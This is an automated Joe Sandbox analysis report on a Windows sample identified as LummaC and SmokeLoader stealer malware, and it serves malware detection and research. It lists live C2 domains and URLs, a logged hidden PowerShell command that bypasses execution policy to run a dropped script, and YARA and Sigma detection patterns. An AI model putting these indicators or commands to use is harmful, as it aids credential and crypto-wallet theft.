Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1483443
MD5:0290bde72b9f8d6f9b1efda467db3a91
SHA1:14d50efef82842167fd114fa3325fb3f9e887309
SHA256:26c54892680041a57956938e8c25981c808f2ec1dd947b5db3b9da4162cfdef9
Tags:exe
Infos:

Detection

LummaC, Go Injector, LummaC Stealer, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Check for Windows Defender sandbox
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected SmokeLoader
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious ZIP file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0290BDE72B9F8D6F9B1EFDA467DB3A91)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 6267.exe (PID: 8064 cmdline: C:\Users\user\AppData\Local\Temp\6267.exe MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 60FC.exe (PID: 5300 cmdline: C:\Users\user\AppData\Local\Temp\60FC.exe MD5: D3785ED170CDB1F4784D3DFF3A61DAE0)
        • BitLockerToGo.exe (PID: 7784 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • 6BC6.exe (PID: 4888 cmdline: C:\Users\user\AppData\Local\Temp\6BC6.exe MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)
        • 6BC6.exe (PID: 3384 cmdline: "C:\Users\user\AppData\Local\Temp\6BC6.exe" -HOSTRUNAS MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)
        • powershell.exe (PID: 5900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 6267.exe (PID: 5268 cmdline: "C:\Users\user\AppData\Local\Temp\6267.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 6267.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Local\Temp\6267.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sbttifb (PID: 7900 cmdline: C:\Users\user\AppData\Roaming\sbttifb MD5: 0290BDE72B9F8D6F9B1EFDA467DB3A91)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "callosallsaospz.shop"], "Build id": "bOKHNM--"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\60FC.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000D.00000003.2677007579.000000000281E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
            • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
            00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
              • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
              Click to see the 21 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.0.60FC.exe.7ff7e7250000.0.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
                8.2.60FC.exe.7ff7e7250000.5.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\6267.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 2580, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#8984_8yUscnjrUY
                  Sigma detected: Powerup Write Hijack DLL
                  Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5900, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6BC6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6BC6.exe, ParentProcessId: 4888, ParentProcessName: 6BC6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 5900, ProcessName: powershell.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6BC6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6BC6.exe, ParentProcessId: 4888, ParentProcessName: 6BC6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 5900, ProcessName: powershell.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6BC6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6BC6.exe, ParentProcessId: 4888, ParentProcessName: 6BC6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 5900, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\6267.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 2580, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#8984_8yUscnjrUY
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\sbttifb, CommandLine: C:\Users\user\AppData\Roaming\sbttifb, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sbttifb, NewProcessName: C:\Users\user\AppData\Roaming\sbttifb, OriginalFileName: C:\Users\user\AppData\Roaming\sbttifb, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\sbttifb, ProcessId: 7900, ProcessName: sbttifb
                  Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\6BC6.exe, ProcessId: 4888, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyehpibx.euj.ps1
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5900, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6BC6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6BC6.exe, ParentProcessId: 4888, ParentProcessName: 6BC6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 5900, ProcessName: powershell.exe

                  Snort Signatures

                  No Snort rule has matched

                  Suricata Signatures

                  Timestamp:2024-07-27T14:52:31.657142+0200
                  SID:2039103
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:54:55.268571+0200
                  SID:2039103
                  Source Port:49834
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:27.996138+0200
                  SID:2800584
                  Source Port:443
                  Destination Port:49774
                  Protocol:TCP
                  Classtype:Attempted User Privilege Gain
                  Timestamp:2024-07-27T14:53:39.382499+0200
                  SID:2054602
                  Source Port:49789
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:19.116637+0200
                  SID:2039103
                  Source Port:49851
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:08.493473+0200
                  SID:2011803
                  Source Port:443
                  Destination Port:49755
                  Protocol:TCP
                  Classtype:Executable code was detected
                  Timestamp:2024-07-27T14:53:32.811023+0200
                  SID:2803274
                  Source Port:49782
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T14:52:58.418710+0200
                  SID:2039103
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:01.754048+0200
                  SID:2039103
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:54:44.446732+0200
                  SID:2039103
                  Source Port:49827
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:06.564520+0200
                  SID:2039103
                  Source Port:49754
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:54:39.497505+0200
                  SID:2039103
                  Source Port:49823
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:13.905512+0200
                  SID:2039103
                  Source Port:49847
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:17.867061+0200
                  SID:2039103
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:44.978455+0200
                  SID:2039103
                  Source Port:49869
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:03.446348+0200
                  SID:2039103
                  Source Port:49839
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:08.805718+0200
                  SID:2039103
                  Source Port:49843
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:57.378795+0200
                  SID:2039103
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:55.195639+0200
                  SID:2039103
                  Source Port:49876
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:27.422888+0200
                  SID:2039103
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:17.558822+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49730
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:43.881896+0200
                  SID:2054602
                  Source Port:49793
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:34.812418+0200
                  SID:2039103
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:34.224941+0200
                  SID:2039103
                  Source Port:49861
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:04.435366+0200
                  SID:2039103
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:56:06.222805+0200
                  SID:2039103
                  Source Port:49883
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:56:00.468739+0200
                  SID:2039103
                  Source Port:49879
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:23.382489+0200
                  SID:2039103
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:54:33.846968+0200
                  SID:2039103
                  Source Port:49819
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:18.920228+0200
                  SID:2039103
                  Source Port:49759
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:55.707934+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49745
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:39.292053+0200
                  SID:2039103
                  Source Port:49865
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:36.360530+0200
                  SID:2054602
                  Source Port:49786
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:28.977846+0200
                  SID:2039103
                  Source Port:49858
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:41.864731+0200
                  SID:2054602
                  Source Port:49791
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:05.492357+0200
                  SID:2039103
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:30.720846+0200
                  SID:2054653
                  Source Port:49778
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:08.356151+0200
                  SID:2011803
                  Source Port:443
                  Destination Port:49755
                  Protocol:TCP
                  Classtype:Executable code was detected
                  Timestamp:2024-07-27T14:53:28.939002+0200
                  SID:2054602
                  Source Port:49777
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:32.761581+0200
                  SID:2048094
                  Source Port:49781
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-27T14:53:02.361589+0200
                  SID:2019714
                  Source Port:49751
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T14:53:30.271564+0200
                  SID:2054602
                  Source Port:49778
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:00.692480+0200
                  SID:2039103
                  Source Port:49749
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:25.533642+0200
                  SID:2039103
                  Source Port:49770
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:09.683210+0200
                  SID:2011803
                  Source Port:443
                  Destination Port:49755
                  Protocol:TCP
                  Classtype:Executable code was detected
                  Timestamp:2024-07-27T14:53:20.018613+0200
                  SID:2039103
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:29.548715+0200
                  SID:2054653
                  Source Port:49777
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:32.714081+0200
                  SID:2039103
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:24.455260+0200
                  SID:2039103
                  Source Port:49768
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:45.610111+0200
                  SID:2054653
                  Source Port:49793
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:33.751293+0200
                  SID:2039103
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:08.214321+0200
                  SID:2020757
                  Source Port:443
                  Destination Port:49755
                  Protocol:TCP
                  Classtype:Possibly Unwanted Program Detected
                  Timestamp:2024-07-27T14:53:33.669570+0200
                  SID:2054602
                  Source Port:49784
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:49.930968+0200
                  SID:2039103
                  Source Port:49872
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:30.610512+0200
                  SID:2039103
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:22.333308+0200
                  SID:2039103
                  Source Port:49763
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:28.414673+0200
                  SID:2054591
                  Source Port:52083
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:29.553200+0200
                  SID:2039103
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:59.471766+0200
                  SID:2039103
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:31.952538+0200
                  SID:2054602
                  Source Port:49781
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:53:11.565395+0200
                  SID:2101390
                  Source Port:443
                  Destination Port:49755
                  Protocol:TCP
                  Classtype:Executable code was detected
                  Timestamp:2024-07-27T14:54:49.649274+0200
                  SID:2039103
                  Source Port:49830
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:52:28.474855+0200
                  SID:2039103
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T14:55:23.985329+0200
                  SID:2039103
                  Source Port:49854
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://callosallsaospz.shop/lbfAvira URL Cloud: Label: malware
                  Source: callosallsaospz.shopAvira URL Cloud: Label: malware
                  Source: https://mussangroup.com/wp-content/images/pic1.jpgAvira URL Cloud: Label: malware
                  Source: https://callosallsaospz.shop/Avira URL Cloud: Label: malware
                  Source: https://callosallsaospz.shop/apiAvira URL Cloud: Label: malware
                  Source: https://callosallsaospz.shop/b(fAvira URL Cloud: Label: malware
                  Source: lariatedzugspd.shopAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\sbttifbAvira: detection malicious, Label: HEUR/AGEN.1312596
                  Found malware configuration
